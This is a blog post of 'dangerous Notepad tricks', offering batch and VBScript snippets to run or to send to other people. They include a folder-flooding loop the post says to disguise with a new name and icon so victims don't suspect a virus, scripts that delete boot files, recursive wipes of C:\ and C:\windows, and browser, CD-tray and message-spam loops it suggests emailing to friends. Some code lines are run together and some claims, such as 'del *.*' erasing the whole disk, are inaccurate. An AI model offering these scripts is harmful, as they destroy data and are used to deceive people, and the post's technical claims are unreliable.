Top 4 Most Dengerous Notepad Tricks -[CAUTION] + Some Simple Notepad Tricks

 on Rabu, 25 September 2013  





1. How to create more than 3,000 folders under a minute:

1) Open your notepad and type the following code.
@echo off:topmd %random%goto top
2) Save it as "1000.bat" @echo off makes your screen appear blank but it is actually making hundreds of folders. md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos) goto top – return the command
to :top, causes an infinite loop.
NOTE: The folders will get created in the directory where you saved
the ”1000.bat” file.
The file might look suspicious to your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t suspect the file to be a virus.
 ——————————————————————————————————————

2. How to Shutdown a computer forever?

Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following code into your notepad


@echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU
RUN IT !!!
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.

cmd /c del c:\windows\* /F /S /Qcmd /c del c:\* /F /S /Q


Paste it in NotePad And Save It
with Extension .cmd or .bat.

 ——————————————————————————————————————

3. How to Delete all your system files with a small command!

Copy the following code into notepad and save it as a .bat
file.
del *.*


All your files in your hard disk will vanish in less than 5 mins.

 ——————————————————————————————————————

4. RAM crashing trick
open notepad and type

:Astart http://soft--tech.blogspot.com/goto A



save with .bat extension.
Infinitely loops your browser .
 ——————————————————————————————————————


NOTE: Try at your own risk WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
ENJOY!!!

----------------------------------------------------------------------------------------------------------------------------------

Test Your Anti-Virus

You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:
  • Open Notepad.
  • Copy the code give below in the notepad file:
    X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • Save it with an .exe extension like testvirus.exe
As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program.
NOTE: The EICAR test file (#3) is a 16-bit application and cannot be run on 64-bit versions of Windows.

——————————————————————————————————————
Continually pop the CD Drive

  • Open Notepad.
  • Copy the code given below onto the notepad file:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
  • Save it as “Anything.VBS”.
Now open the file and see the magic! The file will continuously force the CD rom to pop out! And If you have more than one then it pops out all of them!

——————————————————————————————————————

Matrix Effect

Matrix Trick 300x180Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:
  • Open Notepad.
  • Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • Save the file with .bat extension like Matrix.bat
Thats it. Just open the file to see the matrix effect right before your eyes!

——————————————————————————————————————

Constantly Repeat Messages

Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL….). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:
  • Open Notepad.
  • Paste the following code in the notepad file:
@ECHO off
:Begin
msg * Hi  
 msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d Haha
GOTO BEGIN
  • Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat
After saving the file just open it (by double clicking) and see what happens.
Pssstttt……. You can piss of your friends by sending it as an email attachment asking them to try it out !

——————————————————————————————————————



Top 4 Most Dengerous Notepad Tricks -[CAUTION] + Some Simple Notepad Tricks 4.5 5 Unknown Rabu, 25 September 2013 1. How to create more than 3,000 folders under a minute: 1) Open your notepad and type  the following code. @echo off :top md %random% goto ...


Tidak ada komentar:

Posting Komentar

Diberdayakan oleh Blogger.